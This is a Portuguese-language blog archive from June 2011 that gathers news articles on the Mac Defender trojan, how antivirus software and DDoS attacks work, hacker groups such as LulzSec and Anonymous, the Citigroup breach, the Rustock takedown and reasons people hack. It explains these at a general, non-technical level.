quarta-feira, 29 de junho de 2011

Mac Defender Malware: a Apple não está mais segura

Nova ameaça de malware afeta usuário da Maçã
Em fevereiro de 2006, os usuários do Mac OS X levaram um grande susto: havia sido descoberto o primeiro vírus para o sistema. A praga virtual, conhecida como Leap ou Oompa Loompa, era praticamente inofensiva, já que não se espalhava pela internet. O malware era capaz de se movimentar apenas por redes locais (LAN), usando o protocolo Bonjour.
Além disso, não era nada fácil ser infectado pelo Leap. O usuário precisava se esforçar para isso: receber um arquivo TGZ via iChat, descompactá-lo, executá-lo e, no caso de usuários comuns, informar a senha do administrador para ganhar acesso às configurações do sistema.
Como se não bastasse, o vírus infectava apenas algumas aplicações e, mesmo assim, possuía um bug que impedia o aplicativo infectado de ser executado. Ou seja, ele colaborava com a própria extinção, já que, sem executar o “programa-vítima”, a praga não conseguia se espalhar. A solução para a ameaça era muito simples. Bastava remover o arquivo do Leap do computador e reinstalar as aplicações infectadas.
Mas, agora, os fãs do Mac OS X têm um problema novo para se preocupar. Em maio de 2011, se espalhou a notícia de uma nova ameaça, muito mais preocupante.

Mac Defender, a nova ameaça

Captura de tela com o Mac Defender em ação (Fonte da imagem: RealityPod)
O Mac Defender é um cavalo de troia que se disfarça de software antivírus. Dessa forma, os usuários mais desatentos acabam instalando, por engano, um software mal-intencionado. A imprensa especializada já considera o novo malware como o mais ameaçador já criado para o sistema operacional da Apple.
A instalação do Mac Defender também não é tão fácil de acontecer. O usuário precisa confirmar e interagir em algumas etapas do processo; a instalação do trojan não é invisível aos olhos do usuário, como no Windows.
Os responsáveis pelo malware usam uma técnica conhecida como spamdexing para fazer com que o link para o cavalo de troia seja mais visível ao usuário quando ele procurar imagens em mecanismos de buscas. Ao clicar na falsa figura, uma janela popup, com a aparência de uma aplicação nativa do Mac OS X, finge analisar o disco rígido da máquina e encontrar alguns vírus.
É nesse ponto que o usuário é impelido a baixar e instalar o “antivírus”. Pior ainda, o malware toma conta do navegador web da vítima, exibindo pornografia e expondo o usuário ao roubo de informações sigilosas, como o número do cartão de crédito.
Para instalar o falso software, é necessário informar a senha do usuário administrador da máquina e prosseguir com o processo de instalação até o final, clicar em botões do tipo “Próximo” e “Finalizar”. Ou seja, a pessoa tem que tentar bastante para ser infectado pelo Mac Defender.

Responsáveis pelo malware

O pesquisador de segurança online Brian Krebs investigou o caso e descobriu que a nova ameaça está relacionada com a ChronoPay, uma empresa russa de pagamento online. Em seu blog, Krebs conta que, ao analisar dois domínios que direcionavam o usuário para malware, ele encontrou o endereço “fc@mail-eye.com” como email de contato.
Ano passado, milhares de documentos internos e emails confidenciais da ChronoPay vazaram, graças a uma falha de segurança da companhia. Esses documentos revelam que a empresa russa é dona do domínio “mail-eye.com” e que mantém o site em servidores alemães. Os registros também indicam que o endereço de email “fc@mail-eye.com” pertence ao auditor da ChronoPay, Alexandra Volkova.
A empresa publicou um comunicado negando todas as acusações, porém, o passado da ChronoPay acaba pesando contra ela, já que essa não é a primeira vez em que a companhia se envolve em uma polêmica desse tipo.

Os filhos do Mac Defender

Um dos problemas causados pelo Mac Defender é que ele acabou gerando novas ameaças. Variantes do novo cavalo de troia já foram encontrados na internet sob o nome de Mac Protector, Mac Security e Mac Guard.
A variante Mac Guard é responsável por um “avanço”: o instalador do malware é iniciado sem que o usuário informe a senha do administrador. Apesar de mais perigoso, o processo de instalação ainda precisa ser completado manualmente, o que torna a infecção mais difícil. Mas todo cuidado é pouco. Se você não estava procurando um antivírus na internet, não tem por que instalar o software sugerido por uma janela popup.

Resposta da Apple

A empresa de Steve Jobs já publicou um comunicado sobre a nova ameaça, junto com um tutorial de como remover o cavalo de troia do computador e, até mesmo, com dicas de como evitá-lo. A Apple também prometeu uma atualização para o sistema operacional que será capaz de identificar e remover o Mac Defender da máquina infectada.
Ainda não apareceu um malware realmente preocupante para o Mac OS X, como as inúmeras pragas virtuais que afetam o Windows. Mas, talvez, a Maçã deva começar a reforçar ainda mais a segurança de seu sistema. Afinal, o que está em risco é um dos grandes diferenciais do produto.

[Atualizado]

A Apple liberou hoje (31) no começo da noite o Security Update 2011-003 para usuários do Mac OS X Snow Leopard. O pacote de atualizações traz mecanismos de proteção contra do malware MacDefender. Atualizado o sistema, ele é capaz de verificar os arquivos transferidos para o Mac em busca de códigos maliciosos, funcionando como uma espécie de antivírus nativo.

Como funciona um antivírus

Enquanto você esta aí, acessando tranquilamente o Tecmundo, há uma briga subterrânea acontecendo sem parar nos confins da rede. De um lado, estão os espertinhos e mal-intencionados criando vírus cada vez mais devastadores.  Do outro, estão as empresas correndo atrás do prejuízo e buscando aprimorar seus softwares e sistemas de segurança.
Nesse eterno conflito entre vírus e antivírus, é praticamente impossível ficar imune às pragas que rondam o mundo cibernético. Ao menos que você isole totalmente o seu computador — isto é, não use a internet e não trabalhe com dispositivos externos (CDs, DVDs, pendrives etc.) —, não há como fugir das possíveis ameaças.
Dessa forma, a solução imediata é possuir um antivírus atualizado e de confiança. No entanto, se você sempre se perguntou o que um programa desses tem que o torna capaz de combater e eliminar arquivos maliciosos, chegou a hora de saber um pouquinho mais sobre o assunto.

Guaritas e cães de guarda

Você já reparou como os programas de antivírus sempre estão relacionados a escudos, muralhas, cadeados e outros elementos de vigilância? Isso não é à toa: você pode pensar nesses softwares como verdadeiros esquemas de segurança armados para proteger os seus aparelhos.
Imagine que em sites, emails, arquivos baixados e dispositivos externos conectados à máquina existem intrusos querendo agir maliciosamente no seu sistema (para mais detalhes sobre os vários tipos de ameaças e ataques, consulte o nosso "glossário do mal").
Assim como em uma casa sem muros, um PC sem antivírus instalado permite a entrada de visitantes imprevistos e não os detecta posteriormente — você só percebe os problemas quando tudo fica mais lento, alguns programas travam e o sistema já não responde tão bem.
Um antivírus vigia, literalmente, as portas e portões do seu computador. É como se você pusesse guaritas monitoradas em cada uma delas. Desse jeito, tudo que entra precisa apresentar algo que podemos comparar a um passaporte ou certificado digital.

Como um antivírus reconhece e elimina ameaças?

Se você já teve ou tem um antivírus, certamente topa (e até com certa frequência) com avisos de que o banco de dados de vírus foi atualizado. E o que isso significa? Simples. Se os arquivos que entram na máquina precisam apresentar um “passaporte”, há uma lista de “passaportes” que não são permitidos e, portanto, são vetados pelos “guardas”.
Como explicado no começo deste artigo, as empresas que fabricam os programas de antivírus estão sempre na “cola” dos hackers que originam e disseminam novas pestes pela web, por isso existem atualizações diárias que mantêm a segurança.

Assim sendo, tanto na proteção ativa quanto nos rastreamentos completos no computador, as engrenagens dos antivírus comparam o formato e comportamento dos arquivos que entram com um banco de dados capaz de denunciar elementos perigosos. Resultado: se um componente é detectado, o antivírus o elimina para desinfetar o PC.

Um pouco mais a fundo

Apesar do método de reconhecimento citado acima ser o mais utilizado e efetivo na maioria dos casos, existem outras formas de um antívirus encontrar e neutralizar irregularidades no sistema. O processo chamado de análise heurística monitora constantemente as atividades do computador e entra em ação quando algum programa tenta modificar configurações do sistema ou arquivos importantes.
Pelo fato de vírus inéditos surgirem todos os dias, a biblioteca pode deixar alguma ameaça passar batida pela segurança inicial. Com a análise heurística, esse invasor pode ser descoberto enquanto age silenciosamente.
Outra lógica usada para acabar com viroses leva o nome de sandbox (caixa de areia). Nesse caso, um antivírus simula um ambiente (como se fosse uma máquina virtual, emulando acesso ao registro e componentes) para avaliar o comportamento de alguns arquivos e executáveis. Se a reposta for positiva, um alerta é disparado.

Arquivos em quarentena = cartão amarelo?

Por mais estranho que possa parecer, alguns arquivos podem ser enviados para uma espécie de “prisão”. A chamada quarentena (ou mover para quarentena) é uma opção que vários antivírus oferecem, em determinados casos, aos usuários.
Programas e aplicativos que têm conduta suspeita, mas, ainda assim, não são identificados pelo antivírus, podem ser movidos para a quarentena como uma forma de penalizá-los. Lá eles ficam sob monitoramento até que a base de dados seja atualizada e detecte o arquivo como um vírus.
No entanto, há casos de suspeitas levantadas que podem comprometer o registro do sistema ou até o funcionamento de aplicações e jogos. Os chamados "falsos positivos" ocorrem quando o código de um arquivo não comprometedor é identificado, erroneamente, com a mesma sequência de um vírus.
Quando o antivírus pede permissão para mover algo para quarentena, sugerimos, a fim de evitar maiores problemas, uma busca mais aprofundada sobre o nome em questão. Consulte nosso artigo sobre quarentena e não deixe de conferir as diferenças entre vírus, trojans e spywares para saber mais sobre o assunto.

Corrida de gato e rato

Enquanto houver brechas no funcionamento de eletrônicos, haverá gente disposta a burlar esquemas e agir de forma mal-intencionada. Portanto, quem deve estar atento para não sair perdendo nessa história é o próprio usuário.

Antes mesmo de escolher um antivírus, avalie seus hábitos de navegação e uso do micro. Arquivos de suma importância devem ser sempre copiados em backups, enquanto ações duvidosas devem ser evitadas (como abrir emails de desconhecidos ou clicar em banners que prometem absurdos).
Temos um guia completíssimo com algumas dicas que ajudam a proteger seu computador e também suas contas de email e em redes sociais. Vale lembrar que ataques de hacker podem ir muito além de travamentos, e alguns piratas podem efetivamente roubar senhas e até mesmo efetuar transações bancárias sem consentimento do dono.
Por fim, a dica que fica é: evite comportamento de risco e mantenha sempre um antivírus atualizado.  Não importa qual — teste alguns e tire suas próprias conclusões, pois nem sempre uma opção com centenas de configurações pode ser a melhor para a sua situação. Caso contrário, reze ou acenda velas (muitas!) para não ter dores de cabeça tão cedo com a sua máquina.

DDoS: como funciona um ataque distribuído por negação de serviço

Está repercutindo em todos os sites de tecnologia e de notícias. Aconteceram, nessa terça-feira (22), ataques aos sites da Receita Federal, da Presidência da República, do Portal Brasil e da Petrobrás. Você possivelmente já deve saber quem são os responsáveis pelos ataques, porém talvez ainda não faça ideia de como os hackers tiraram do ar os sites do governo brasileiro.
Para esclarecer um pouco esses misteriosos ataques, o Tecmundo vai lhe explicar o tipo utilizado e como ele funciona. Contudo, antes de esclarecermos os pormenores do ataque hacker, vamos falar sobre os servidores da web, que estão diretamente ligados ao assunto.

Por trás de toda página há um servidor

Os sites do governo, assim como quaisquer outros, ficam hospedados em computadores dedicados e de alta capacidade. Essas máquinas são chamadas de servidores e recebem esse nome porque servem às solicitações efetuadas pelos clientes (usuários comuns, como você que está lendo esta matéria).
Assim como qualquer sistema do mundo, os servidores possuem limitações, tanto no processamento de informações quanto no envio e recebimento de dados. As limitações de processamento ocorrem porque essas máquinas possuem processadores que não têm “poder” infinito. Além disso, elas são equipadas com uma determinada quantidade de memória, a qual pode ser esgotada conforme o número de processos em execução.
Já as limitações no envio e recebimento de dados ocorrem porque os servidores são equipados com placas de rede, as quais possuem especificações que determinam o máximo de dados que podem trafegar. Isso significa que um servidor não pode enviar dados infinitos e nem mesmo com velocidade capaz de atender ao máximo que um cliente requisita. Além disso, o sistema que gerencia o servidor possui uma limitação de slots (requisições), o que determina o máximo de usuários que podem ser atendidos simultaneamente.
Vale salientar que essa explicação é apenas um esboço do todo que acontece por trás de um site da web. Na realidade, uma página grande da internet tem múltiplos servidores, os quais conseguem atender milhares ou milhões de clientes (usuários) simultaneamente.

Excedendo os limites

Um ataque hacker pode acontecer de diversas maneiras e ter diferentes objetivos. O tipo de ataque mais comum é a invasão, que em geral tem como objetivo roubar dados sigilosos (geralmente o objetivo é atacar instituições financeiras para obter lucros) ou estragar o funcionamento da página (o que pode ser feito através da exclusão de arquivos).
No caso do ataque realizado pelo grupo Lulz Security Brazil, não foi exatamente uma invasão, mas sim um ataque distribuído por negação de serviço. Esse tipo de ataque não visa roubar dados (em um primeiro momento), porém tem como objetivo retirar determinado site do ar temporariamente sem causar grandes danos. Os objetivos por trás do ataque como o que aconteceu podem ser muitos, desde uma reinvindicação política até atividades criminosas.
O ataque distribuído por negação de serviço (DDoS, do inglês Distributed Denial-of-Service attack) atinge sua meta excedendo os limites do servidor. Para tal façanha, os responsáveis pelo ataque criam programas maliciosos que são instalados em diversas máquinas, as quais realizarão múltiplos acessos simultâneos ao site em questão.
E como os servidores possuem limitações com relação ao número de acessos em um mesmo instante, acaba ocorrendo que o servidor não aguenta atender as requisições e é retirado do ar. Um ataque distribuído por negação de serviço pode simplesmente reiniciar os servidores ou pode causar o travamento total do sistema que opera por trás do site.

Os zumbis também têm culpa

Para aumentar a eficácia do ataque, um DDoS muitas vezes conta com a ajuda de máquinas zumbis, que integram uma rede zumbi. Computadores desse tipo foram infectados por pragas que tornam o acesso à internet extremamente lento, isso porque eles estão sob o comando de outra máquina, também conhecido como computador-mestre.
E justamente por contar com uma legião de máquinas atacando é que os DDoS têm grande eficiência. Por se tratar de milhares computadores realizando o ataque, fica muito mais difícil combatê-lo, porque os responsáveis pela segurança do servidor não conseguem estabelecer regras para impedir todos os acessos que estão causando danos.

Tentando resolver o problema

Para tentar combater um ataque distribuído por negação de serviço, os profissionais que trabalham contra o ataque precisam efetuar configurações nos equipamentos que levam até o site desejado. Em geral, são utilizados filtros que vão determinar quais IPs podem acessar o site e quais são perigosos para o servidor.
Outra solução é recorrer a empresas especializadas, como a Akamai, que utilizam diversos computadores para conter o ataque. Essa técnica é efetiva porque as máquinas estão em diferentes locais do planeta e combatem os zumbis dividindo a tarefa, de modo que cada computador de defesa combata um número reduzido de máquinas.

O ataque pode continuar

O governo brasileiro já divulgou que conteve os ataques realizados em todos os sites, todavia, os responsáveis pelo DDoS podem realizar novos ataques iguais aos que efetuaram ou até piores — invasões dos servidores são bem prováveis. Detectar outros ataques distribuídos por negação de serviço deve ser mais fácil daqui para frente, entretanto, os hackers podem utilizar técnicas ainda mais aperfeiçoadas para futuras atividades contra o governo.
Claro que o assunto DDoS é muito mais complexo do que abordamos aqui, porém, o objetivo era passar uma noção básica do que está acontecendo por trás dos ataques recentes. Você tem algo a acrescentar? Deixe seu comentário!

segunda-feira, 27 de junho de 2011

Quais são os grupos hackers mais assombrosos da internet


Recentemente, diversos ataques hackers foram notícias dos principais meios de comunicação.  A motivação para que a mídia tenha dispensado tanta atenção a esse assunto são as atividades recentes de grupos como LulzSec e Anonymous.
E apesar de o nome desses dois grupos ainda figurarem nas primeiras páginas dos principais sites de notícias, eles representam apenas uma pequena parte das ameaças a que grandes servidores estão expostos. Graças a eles, outros grupos foram criados e alguns declaram até mesmo guerra contra esses “hack stars”!
Confira abaixo a lista dos clãs hackers que estão apavorando a internet e tirando o sono de empresas, governos e celebridades.

Lulzsec

Nada mais justo do que começar a lista com a grande estrela deste ano. O LulzSec ganhou notoriedade ao atacar a Playstation Network, roubando dados de mais de 1 milhão de contas de usuários do sistema.

Primeiros ataques

Logo usado pelo LulzSec (Fonte da imagem: Wikipedia)
Mas o primeiro registro de ataque do grupo se deu em maio de 2011, quando a emissora de TV Fox News classificou o rapper Common como indesejado e imoral, após o cantor ter sido convidado pela primeira dama Michelle Obama para participar de um recital de poesia na Casa Branca. A polêmica toda se deu pelo conteúdo político das letras de Common, que causou críticas severas das alas mais conservadoras dos EUA.
O ataque à Fox foi uma retaliação aos comentários dos apresentadores da emissora. Na ocasião, o grupo divulgou na internet centenas de senhas e logins de emails dos funcionários da emissora, além de divulgar dados pessoais de 73 mil participantes do programa “The X Factor”. Os hackers também invadiram o perfil no LinkedIn de Marian Lai, Vice-presidente da Fox.
Ainda em maio, o grupo invadiu o site da rede de televisão PBS, roubando dados de usuários e publicando uma notícia falsa, alegando que o rapper Tupac Shakur continuava vivo e morando na Nova Zelândia.
O LulzSec prosseguiu com alvos cada vez mais audaciosos. Os hackers tentaram invadir a Nintendo, mas de acordo com a companhia, nenhuma informação valiosa foi acessada pelo grupo. Mais tarde os integrantes declaram que nunca pretenderam fazer mal à Nintendo e que gostam muito do N64.

Alvos governamentais

LulzSec anuncia que o site da CIA foi derrubado
Em junho de 2011, foram os responsáveis pelo vazamento de mais de 25 mil contas de usuários de um site pornográfico. Entre os emails cadastrados estavam o de funcionários do governo malaio e de militares dos EUA. Para manter a privacidade desses usuários, o Facebook cancelou as contas que estavam cadastradas com o mesmo endereço dos emails divulgados pelo LulzSec.
O “currículo” do grupo ganhou mais respeito depois da invasão a sites da CIA e do FBI, além do vazamento de dados de usuários do site senate.gov. Como se não bastasse, o LulzSec também prestou uma espécie de serviço social ao avisar o Sistema de Saúde Nacional do Reino Unido sobre as diversas falhas de segurança que o seu sistema continha.
Em 15 de junho, o grupo também assumiu a autoria do ataque DDoS ao site da Agência Central de Inteligência (CIA), deixando-o fora do ar por mais de duas horas.

Motivação

Processo contra GeoHot foi uma das motivações do grupo
Aparentemente, o LulzSec hackeia pela diversão. Além disso, boa parte das ações é motivada por razões ideológicas. O ataque à PBS, por exemplo, foi uma retaliação ao documentário WikiSecrets, que tratou o Wikileaks de maneira “injusta”, de acordo com integrantes do grupo.
Já ao ataque à Sony parece ter sido uma resposta ao processo que a empresa pretendia mover contra o hacker GeoHot, responsável pelo desbloqueio do Playstation 3. Os atos mais recentes, contra páginas e órgãos governamentais, foram caracterizados como sendo um protesto contra a censura e o monitoramento da internet.

O fim do grupo?


No dia 26 de junho de 2011, o LulzSec publicou uma espécie de carta de despedida. Dizendo que, após esses 50 dias de operação, o grupo estava finalizando suas operações. Junto com o texto foram publicadas mais de 750 mil contas extraídas de fóruns de video game e de jogadores de Battlefield Heroes.
Não se sabe se o grupo vai cumprir a promessa. Além disso, um braço brasileiro do LulzSec foi criado, derrubando e invadindo sites do governo, além de divulgar informações confidenciais da presidenta Dilma Roussef.

Anonymous

Considerado pela CNN como um dos três principais possíveis sucessores ao Wikileaks, o Anonymous começou mais como um meme do 4chan do que como um grupo em si. A ideia é que o termo possa ser usado para assinar ações anônimas e descentralizadas, porém, conduzidas de maneira coordenada.

 

 
Assim, qualquer ação declarada como feita pelo “Anonymous” foi realizada por alguém que se autointitulou como tal, ou seja, não é necessária a aprovação ou filiação ao grupo. Também não existem líderes ou coordenadores do grupo. Todos agem individualmente, mas de maneira com que os resultados obtidos possam beneficiar o grupo.

Ações famosas

Um dos alvos mais famosos do Anonymous é a Habbo, uma rede social que se assemelha a um hotel virtual, em que costumam promover algumas manifestações. Após tomarem conhecimento de que um garoto soropositivo de dois anos foi proibido de usar a piscina de um parque no Alabama, o grupo organizou um bloqueio geral à piscina virtual do Habbo, protegendo a entrada com personagens vestidos todos da mesma forma: terno cinza e visual afro. Depois de serem banidos, acusaram a rede social de fascismo.
Os integrantes anônimos também causaram um prejuízo a um radialista que prega o racismo nos EUA. Ao derrubarem o site de Hal Turner, o mesmo teve que pagar milhares de dólares por excesso de consumo de banda. Além disso, o Anonymous também foi o responsável pela prisão de Chris Forcand, um pedófilo de 53 anos que aliciava menores pela internet.
Fonte da imagem: Wikimedia Commons
O grupo assumiu inúmeras ações cometidas ao longo dos últimos anos, enviando pornografia ao YouTube, prestando apoio aos protestos iranianos de 2009 e atacando sites governamentais dos regimes alvos da Primavera Árabe.
Recentemente, os anônimos tiraram do ar o site da polícia espanhola, em retaliação à prisão de três indivíduos suspeitos de agir em nome do grupo, e da Câmara de Comércio da Flórida, pela prisão de membros do Food Not Bombs, organização voluntária que distribui alimentos aos desabrigados de Orlando.
A motivação é muito semelhante à do LulzSec, alternando entre pura diversão e razões ideológicas.

TeaMp0isoN (Team Poison)

Captura do site hackeado pelo TeaMp0isoN (Fonte da imagem: Reprodução)
O grupo ganhou destaque ao vandalizar o site do LulzSec, grupo o qual eles acusam de não representar o verdadeiro espírito da arte de hackear, acusando-os de usarem bots e ferramentas pré-fabricadas. Além disso, o  TeaMp0isoN também foi o responsável pelo vazamento de dados pessoais do primeiro ministro britânico, Tony Blair.

The Jester (th3j35t3r)


Esta é a exceção de nossa lista, já que o Jester não é um grupo, mas uma única pessoa. O hacktivista, que online também usa a identidade “th3j35t3r”, se descreve como um gray hat,  termo usado para descrever aqueles que cometem ações ilegais, mas com boas intenções.
Ele é conhecido por ter supostamente sido o responsável pelos ataques aos sites WikiLeaks e 4chan, além de inúmeras páginas islâmicas e até mesmo o presidente iraniano Ahmadinejad, sempre em nome do patriotismo americano.
Jester também é conhecido por ter criado uma ferramenta de DDoS conhecida como “XerXes”. Em junho de 2011o o hacker começou a buscar a identidade secreta dos integrantes do grupo Lulzsec, os quais ele considera “crianções”.

A-Team

Pouco tempo antes do LulzSec anunciar o fim de suas atividades, o grupo conhecido como A-Team liberou uma lista com nomes, endereços e outras informações de pessoas que eles alegam ser os integrantes do LulzSec. Muitos acusam essa revelação como uma das causas para o término repentino do famoso grupo.
De acordo com a mensagem anunciada pelo A-Team, o LulzSec não é digno de tanta atenção, já que, depois de ter invadido a Playstation Network, eles não fizeram mais nada de significativo. Eles também acusam o grupo de estar recrutando novas pessoas por terem pouco conhecimento técnico, o que os impede de continuar na ativa.

Citigroup também sofreu ataque de hackers


Fonte da Imagem: reprodução do site oficial do Citigroup
Hackers invadiram a rede de computadores do Citigroup e tiveram acesso a dados de 200 mil donos de cartões bancários na América do Norte (cerca de 1% do total de correntistas nos EUA).
Nomes de clientes, números de contas e informações de contato puderam ser visualizados. Mas outros dados, como datas de nascimento, números de previdência social, datas de vencimento e códigos de segurança não foram comprometidos, de acordo com o que informou o Citi na última quarta-feira, quando tornou pública a informação da brecha de segurança através de um comunicado por email.
Nesse comunicado, um porta-voz afirmou que o banco está em contato com clientes cujas informações foram impactadas e que foram implementados procedimentos aprimorados para prevenir a recorrência deste tipo de acontecimento. “Para a segurança desses clientes, não estamos divulgando mais detalhes”, disse Sean Kevelighan. Ainda de acordo com o comunicado, o Citi não sabe como a brecha aconteceu.
De acordo com a agência Reuters americana, na quinta-feira (9), a FDIC (agência federal que tem como objetivo garantir depósitos bancários), por meio de sua presidente Sheila Bair, afirmou que vem desenvolvendo novas diretrizes para bancos e que pode vir a pedir para alguns deles aumentarem os padrões de segurança para os usuários.
Essa é mais uma empresa de grande porte que sofre ataques deste tipo. Google, RSA e, mais recentemente, Sony também sofreram ataques virtuais.

Operação reúne autoridades e especialistas em segurança para derrubar rede de spam

O site Bloomberg Businessweek publicou este mês um artigo sobre a mobilização para combater a Rustock, considerada uma das maiores redes de spam do mundo. A ação, organizada pela empresa de segurança FireEye, contou com o recrutamento de forças policiais e jurídicas em diversos países, para acabar com a rede de computadores-zumbis.

Segundo o informe, Alex Lanstein, analista de segurança de 25 anos responsável pela caçada, planejou que todos os pontos de funcionamento da Rustock mapeados fossem atacados simultaneamente. A rede de spam foi derrubada no dia 16 de março deste ano, quando os sete servidores nos EUA e os dois na Holanda foram apreendidos em uma sincronia perfeita.
Entretanto, não foram apenas as autoridades e a FireEye que monitoravam os passos do seu inimigo. Quem mantinha a Rustock também estava de olho nos movimentos dos oponentes. Ao perceber o ataque, remotamente, dados da rede de spam foram apagados. Essa é uma história digna de ser transcrita para o cinema, não concorda?

domingo, 26 de junho de 2011

7 razões para hackear


Em uma das aventuras do Prof. Pardal, famoso personagem publicado pela Disney, o inventor cria um robô que sabe tudo, que pode dar a resposta a qualquer pergunta. Para testar a mais nova criação, Pardal começa com uma pergunta simples: “Por que os pássaros cantam?”. A resposta não poderia ser menos precisa: “Talvez por saberem, talvez por quererem, talvez por poderem”. Essa é a explicação para quase todas as perguntas feitas à máquina, e é o que adiciona um toque de humor à história.
Quando nos questionamos sobre por que algumas pessoas “hackeiam”, também podemos cair nessa mesma resposta: elas gostam disso, elas sabem e podem fazer isso. Mas o ser humano é muito mais complexo. As motivações que movem o hacker podem ser as mais diversas.
Originalmente, o termo “hackear” era sinônimo de cortar algo usando um machado ou outro instrumento cortante. Não é à toa, por exemplo, que a serra de cortar metais é conhecida, em inglês, como hacksaw. O Jargon File, dicionário de gírias hackers, confirma a origem. De acordo com o documento, um hacker era alguém que construía móveis usando um machado.
Por mais distante que pareça, a origem da palavra ainda traz algumas semelhanças com o sentido mais moderno que o termo adquiriu. São normalmente chamados de hackers aqueles que não se contentam com o simples uso de uma ferramenta, como programas de computador: pessoas que querem ir além, explorar, construir, entender como funciona aquilo com o que estão trabalhando.
Em vez de passar horas entalhando ou cortando um bloco de madeira para construir algo útil, hackers agora passam dias em frente de um computador, esculpindo e talhando bits para alcançar os seus objetivos. Mas para quê? Por que as pessoas “hackeiam”?

1. Curiosidade


Essa é, provavelmente, a porta de entrada para o mundo dos hackers: um desejo quase incontrolável de investigar, de entender algo. Durante a infância, muitos quebravam os próprios brinquedos, apenas para descobrir como eles funcionavam. Desmontavam partes, encaixavam com pedaços de outros brinquedos, modificavam, criavam algo novo.
No mundo dos computadores, isso funciona da mesma forma. É a curiosidade que move o hacker a entender como um software é construído. Com isso, eles aprendem a programar, estudando linguagens de programação e construindo seus próprios programas. Melhor ainda, eles adquirem um conhecimento muito mais amplo do funcionamento de um programa de computador, possibilitando a exploração de falhas e bugs.
Muitas vezes essa também é a motivação para a invasão de sistemas online: apenas conferir como isso é possível, descobrir quais são os passos necessários.

2. Diversão

Outro fator que conta muito para o hacker é a diversão. Antes de qualquer coisa, o hacker tem que gostar do que está fazendo e se divertir com aquilo. Caso contrário, ele não se dedicará tanto quanto gostaria.

3. Desafio

Desafios são grandes motivadores para os hackersFonte da imagem: Wikipédia
É conhecido que pessoas muito inteligentes não gostam de se ater a tarefas monótonas e repetitivas. O hacker precisa se sentir desafiado, instigado a prosseguir com a ação. Muitas vezes essas pessoas agem somente por agir, para perceberem que algo é possível e que eles conseguem fazer. Hackers gostam de resolver problemas e, quanto mais complexos esses problemas, melhor. Diga a um hacker que algo é impossível de ser feito e ele vai tentar até conseguir.

4. Liberdade


Essa é uma das razões mais conhecidas para fazer com que essas pessoas ignorem a lei e quebrem o mecanismo de segurança de sistemas e dispositivos. Hackers gostam de explorar os limites de tecnologias e equipamentos e não querem ficar limitados ao uso imposto pela indústria ou fabricante de um dispositivo.
O gosto pela liberdade é o que move indivíduos como Jon Lech Johansen, por exemplo. O hacker norueguês é o responsável por ter criado o DeCSS, software que tornou possível o uso de DVDs comerciais em sistemas Linux. Sem ele, os usuários Linux estariam esperando, até hoje, uma solução para o problema de licenciamento da DVD CCA, a organização responsável pela proteção anticópia inserida nos discos.
E já que citamos o Linux, não é possível fechar esta seção sem mencionar Richard Stallman, o pai do projeto GNU e defensor ferrenho do software livre. Cansado de esbarrar nas limitações de softwares proprietários, Stallman resolveu convocar o mundo a voltar aos tempos de outrora, quando código-fonte era distribuído livremente e seus usuários podiam alterá-lo e estudá-lo sem limitações.
Afinal, parte da cultura hacker diz respeito a construir algo. E quer melhor forma de colocar isso prática do que criar aquilo que você tanto sente falta?

5. Ativismo

Recentemente, serviços da Sony foram alvos de diversos ataques hacker
Ideologias também podem motivar hackers a se unirem contra um alvo em comum. Muitas vezes, eles acabam até mesmo atacando ou vandalizando páginas que propagam ideias que vão contra algum interesse público ou até mesmo pessoal.
Um caso muito popular diz respeito ao Wikileaks, site que costuma revelar documentos e atividades secretas de governos e corporações. Quando operadoras de cartão de crédito como Visa e Mastercard proibiram a transferência de doações para a organização, hackers de todo o mundo se mobilizaram contra essas empresas, atacando seus websites e deixando-os indisponíveis durante um bom tempo.
Recentemente, a Sony também foi alvo de diversos ataques. Além de quebrar a segurança da Playstation Network, a empresa também sofreu diversos ataques a outras unidades. Muitos especulam que a principal razão por trás desses atos foi o processo que a empresa moveu contra GeoHot, hacker responsável por desbloquear o Playstation 3.

6. Dinheiro


Apesar de normalmente agirem pelos motivos citados acima, os hackers também têm seu preço. Não são raras as vezes em que alguém fica famoso por invadir sistemas considerados seguros e, tempo depois, acaba contratado como especialista em segurança.
Kevin Mitnick, um dos hackers mais famosos e adorados do mundo, hoje mantém sua própria empresa de consultoria em segurança. E ninguém melhor para cuidar de uma rede do que aqueles que conhecem cada detalhe dela, certo?
Mas o dinheiro também pode corromper hackers. Muitos, ao perceberem que podem ganhar um pouco de grana com pequenos delitos virtuais, acabam indo para o “lado escuro da força”, cometendo fraudes financeiras e outros tipos de crimes, em benefício próprio.

7. Amor

Essa é uma razão muito mais comum do que se imagina. E, muitas vezes, acaba motivando até mesmo pessoas que nunca pensaram em ser um hacker. Não são raros os casos em que, desconfiadas de estarem sendo traídas, pessoas roubam senhas, invadem perfis de redes sociais e chegam até mesmo a instalar keyloggers para monitorar a vida virtual do cônjuge.

Quem se interessar pelo assunto, pode ler, como leitura complementar, o Hacker HowTo, escrito por Eric S. Raymond, um dos porta-vozes do software livre e autor do livro “A Catedral e o Bazar”. Existe, inclusive, uma tradução para o português desse documento.
E para você? O que é que motiva hackers e crackers a agirem dessa forma? Deixe um comentário contando a sua opinião!

Grupo hacker que atacou Sony teria invadido página da CIA


O LulzSec, um dos grupos de hackers que invadiu sites da Sony e de outros serviços nos últimos meses, assumiu o ataque de uma entidade bem mais poderosa que foi realizado na noite dessa quarta-feira (15).
Em uma mensagem postada pelo perfil da equipe no Twitter, que é atualizado constantemente, eles afirmam que foram os responsáveis por um ataque à página da CIA, a Agência Central de Inteligência dos Estados Unidos.
O endereço cia.gov esteve indisponível durante um período para alguns usuários norte-americanos que moram próximos à sede da agência. O grupo costuma postar uma mensagem em seu site oficial relatando os motivos e até como se deu o ataque, mas nada foi atualizado até agora com relação ao ataque aos servidores da CIA.

Cada vez mais longe

O ataque contra a PlayStation Network, que ficou fora do ar por mais de um mês, além de invasões a vários outros serviços da Sony, já virou até motivo de piada. Mas o assunto parece ter ficado mais sério: esses foram apenas os primeiros eventos de uma série de invasões a páginas de órgãos e empresas de todo o mundo.
Só nas últimas semanas, foram noticiadas invasões a entidades como o FMI (Fundo Monetário Internacional) e o Senado dos Estados Unidos, sendo este um trabalho do próprio LulzSec. A maioria dos ataques não se resumem apenas à queda dos servidores, mas ao acesso e exposição de dados confidenciais desses endereços.

Turquia prende membros do grupo hacker Anonymous

Ativistas do Anonymous protestam nas ruas da Espanha. (Fonte da imagem: Wikimedia Commons)
Reuters. Ece Toksabay - A polícia da Turquia deteve 32 membros do grupo ciberativista Anonymous sob suspeita de planejar ataques contra uma série de websites, reportou a agência de notícias estatal turca Anatolian.
